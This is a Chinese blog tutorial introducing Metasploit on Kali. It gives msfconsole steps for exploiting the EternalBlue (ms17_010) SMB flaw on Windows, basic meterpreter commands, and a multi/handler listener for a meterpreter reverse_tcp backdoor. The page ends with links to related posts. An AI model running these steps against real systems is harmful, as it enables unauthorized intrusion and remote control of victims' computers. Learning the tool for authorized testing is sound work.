Kali工具之Metasploit初体验

最新推荐文章于 2024-06-13 09:54:29 发布
最新推荐文章于 2024-06-13 09:54:29 发布
阅读量303 收藏 2
点赞数 9
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60778231/article/details/136209755
版权

一、介绍

Metasploit是利用和测试安全漏洞的开源工具,集成了各种平台上的常见溢出漏洞和Shellcode。

二、使用流程

1.使用root账户进入kali终端

sudo su

2.进入Metasploit面板

msfconsole

三、简单使用

(一)利用永恒之蓝漏洞攻击Windows操作系统

2017年之前的Windows系统基本都存在永恒之蓝漏洞,但过于老旧的系统如XP等不存在此漏洞

1.搜索模块

search ms17_010

2.使用模块

use exploit/windows/smb/ms17_010_eternalblue

exploit/… 为攻击所利用的脚本,作用是进行漏洞攻击
auxiliary/… 为辅助检测脚本,作用是检测漏洞是否存在

3.查看攻击必选项

show options

4.将Required显示为yes的必选项参数进行添加

如:设置攻击对象IP等

set RHOST xxx.xxx.xxx.xxx

5.开始攻击

run

6.检查攻击完成情况

若显示win,则完成攻击

(二)metasploit的后渗透模块–meterpreter

介绍

meterpreter是metasploit的后渗透工具

简单使用

1.查看帮助

help

2.进入后台

background

3.退出

exit

(三)handler模块

本模块常用于配合meterpreter工具进行后门植入时,用作监听用途

简单使用

1.使用模块

use exploit/multi/handler

2.查看必选项

show options

3.设置必选项

通常需要设置三个必选项

set payload windows/x64/meterpreter/reverse_tcp 
set lhost=xxx.xxx.xxx.xxx
set lport=x

若同时要用msfvenom工具时,该handler模块的这三个必选项必须要与msfvenom设置的保持一致

4.运行handler程序

run
_BEYOND
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【MSF】Kali最强渗透工具Metasploit
zou09241314的博客
10-23 907
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
Kali最强渗透工具-metasploit
翊予山川的博客
12-13 1262
永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit 攻击 windows 操作系统。
Kali工具之msfvenom体验
qq_60778231的博客
02-22 306
msfvenom是kali中生成远控木马的工具,在本地监听中上线,在目标机上执行后门。
kali工具介绍
KHOST的博客
01-05 8715
工具kali官方简介(竖排):https://tools.kali.org/tools-listing 名称 类型 使用模式 功能 功能评价 dmitry 信息收集   whois查询/子域名收集/端口扫描 whois并不简单明了;子域名和邮箱依赖google;端口扫描速度一般 dnmap 信息收
Kali之——菜单中各工具功能
冰河的专栏
11-15 3420
一、说明 各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机还是比较耗内存的,内存不够可以试试pentestbox,从功能上可以理解为运行在windows上的kali发行版,kali主流工具它都...
Kali工具大全
一杯咖啡的渗透记忆
04-11 9857
转载:https://www.cnblogs.com/ECJTUACM-873284962/p/8494903.html称 类型 使用模式 功能 功能评价 dmitry 信息收集 whois查询/子域名收集/端口扫描 whois并不简单明了;子域名和邮箱依赖google;端口扫描速度一般 dnmap 信息收集 用于组建分布式nmap,dnmap_server为服务端;dn...
Kali linux学习入门-Kali菜单中各工具功能
成功路上的奋青者
10-15 2165
想要进入安全行业为安全事业做贡献,就要硬着头皮学点什么。就像为什么军人往往都有更高的成就?因为自律。克服玩游戏的欲望吧,踏踏实实学点东西。Kali Linux工具清单Kali Linux综合包kali-linuxburpsuitehydrajohnmaltegonmapsqlmapwiresharkzaproxy。
MSF体验 - kali linux 入侵XP系统
weixin_30707875的博客
06-12 599
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下步使用Metasploit的过程。首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D...
kali工具列表
CSDNwbdream的博客
03-16 3502
使用模式中,cmd-line表示单条命令形式,shell表示交互shell形式,gui表示是图形界面形式。 名称 类型 使用模式 功能 功能评价 dmitry 信息收集 whois查询/子域名收集/端口扫描 whois并不简单明了;子域名和邮箱依赖google;端口扫描速度一般 dnmap 信息收集 用于组建分布式...
kali工具使用.pdf
09-14
kali工具使用.pdf
kali-linux 工具Metasploit离线式攻击使用教程
12-29
攻击实例讲解4-Metasploit离线式攻击.rar
kali工具集部分翻译.zip
03-10
kali工具集部分翻译.zip 包含了kali Linux工具的部分翻译
kali系统-工具-中文手册-html版
07-15
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常...
kali工具列表.pdf
06-28
kali工具列表.pdf
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SonarQube安全扫描常见问题
帅小缙的大脑风暴❤
06-11 533
SonarQube质量配置之扫描常见问题与问题修复
振弦采集仪在隧道工程中的安全监测与控制研究
最新发布
duxi222333的博客
06-13 501
通过安装振弦传感器,可以实时监测地下水位的变化情况,并采取相应的措施来保证隧道的安全。通过安装振弦传感器,可以实时监测地层的变形情况,并采取相应的措施来保证隧道的安全。同时,振弦采集仪也可以用于隧道施工期间的地层补偿控制,以减少地层的变形对施工的影响。总结,隧道工程的安全监测与控制是非常重要的工作,而振弦采集仪作为一种高精度和灵敏度的仪器,可以有效地监测和控制隧道工程中的地层变形、地下水位变化和地震影响等情况。振弦采集仪具有高精度和灵敏度的特点,能够对隧道工程中发生的微小变形进行准确的监测和控制。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 981
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
kali 如何安装metasploit
06-06
要安装Metasploit,可以按照以下步骤: 1. 打开终端并运行以下命令以更新软件包列表:`sudo apt-get update` 2. 运行以下命令以安装必要的依赖项:`sudo apt-get install build-essential libreadline-dev libssl-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值